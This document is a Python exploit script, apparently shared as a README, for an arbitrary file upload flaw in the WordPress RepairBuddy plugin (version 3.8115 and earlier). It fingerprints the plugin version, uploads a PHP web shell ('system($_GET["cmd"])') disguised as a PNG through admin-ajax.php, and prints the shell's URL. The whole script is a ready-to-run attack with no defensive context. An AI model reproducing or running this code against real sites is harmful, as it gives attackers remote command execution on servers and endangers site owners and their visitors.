README.md
Rendering markdown...
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import argparse
import re
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
def print_banner():
banner = """
@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@ @@@@@@@@ @@@@@@ @@@ @@@@@@@ @@@ @@@@@@@@ @@@@@@ @@@@@@
@@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@ @@@@@@@@ @@@@ @@@@@@@ @@@@ @@@@@@@@ @@@@@@@@ @@@@@@@
!@@ @@! @@@ @@! @@@ @@! @@@@ @@@ @@!@! !@@ @@@!! @@! @@! @@@ @@@
!@! !@! @!@ !@! @!@ !@! @!@!@ @!@ !@!!@! !@! !@! !@! !@! @!@ @!@
!@! @!@ !@! @!!!:! @!@!@!@!@ !!@ @!@ @! !@! !!@ @!! @!! @!@!@!@!@ !!@@!! @!@ @!! !!@!!@!! @!@!!@
!!! !@! !!! !!!!!: !!!@!@!!! !!: !@!!! !!! !!: !!! !@! !!!@!@!!! @!!@!!! !@! !!! !!@!!! !!@!@!
:!! :!: !!: !!: !:! !!:! !!! !:! :!!:!:!!: !:! !!: !!: !!! !!:
:!: ::!!:! :!: :!: :!: !:! :!: !:::!!::: !:! :!: :!: !:! :!:
::: ::: :::: :: :::: :: ::::: ::::::: :: :: ::::: ::: :::: :: ::: :: ::::: :: :: ::::
:: :: : : : :: :: :: : ::: : : : : :: : ::: ::: :: : : :: : : : : : : : :
Exploit By : Nxploit Khaled Alenazi,
"""
print(banner)
def check_vulnerability(url):
readme_url = f"{url}wp-content/plugins/computer-repair-shop/readme.txt"
try:
response = requests.get(readme_url, headers={'User-Agent': user_agent}, verify=False)
if response.status_code == 200 and 'Stable tag: 3.8115' in response.text:
print("🎯 The site is vulnerable. Proceeding with the exploit...")
return True
else:
print("❌ The site is not vulnerable.")
return False
except Exception as e:
print(f"Error checking vulnerability: {e}")
return False
def prepare_headers(url):
return {
'User-Agent': user_agent,
'Accept': 'application/json, text/javascript, */*; q=0.01',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate, br',
'Referer': f"{url}wp-admin/post-new.php?post_type=rep_estimates",
'X-Requested-With': 'XMLHttpRequest',
'Content-Type': 'multipart/form-data; boundary=---------------------------26318640401773937217773873037',
'Origin': url,
'Connection': 'keep-alive'
}
def prepare_data(shell_code):
return f"""
-----------------------------26318640401773937217773873037
Content-Disposition: form-data; name="file"; filename="nxploit.php"
Content-Type: image/png
{shell_code}
-----------------------------26318640401773937217773873037
Content-Disposition: form-data; name="action"
wc_upload_file_ajax
-----------------------------26318640401773937217773873037--
"""
def extract_shell_url(response_text):
match = re.search(r'http[^\s]+nxploit\.php', response_text)
if match:
return match.group(0).replace("\\", "")
return None
def upload_shell(url, shell_code):
upload_url = f"{url}wp-admin/admin-ajax.php"
headers = prepare_headers(url)
data = prepare_data(shell_code)
try:
response = requests.post(upload_url, headers=headers, data=data, verify=False)
print(f"Response: {response.text}")
if response.status_code == 200:
print("✅ Shell uploaded successfully.")
shell_url = extract_shell_url(response.text)
if shell_url:
print(f"🔗 Shell URL: {shell_url}")
else:
print("❌ Failed to extract shell URL.")
else:
print("❌ Failed to upload the shell.")
except Exception as e:
print(f"Error uploading shell: {e}")
def main():
parser = argparse.ArgumentParser(description='WordPress RepairBuddy plugin <= 3.8115 - Arbitrary File Upload vulnerability # By Nxploited ,Khaled alenazi.')
parser.add_argument('-u', '--url', required=True, help='Target URL')
parser.add_argument('-shell', default='<?php system($_GET["cmd"]); ?>', help='Shell code to upload')
args = parser.parse_args()
url = args.url
shell_code = args.shell
if not url.endswith('/'):
url += '/'
print_banner()
if check_vulnerability(url):
upload_shell(url, shell_code)
if __name__ == "__main__":
main()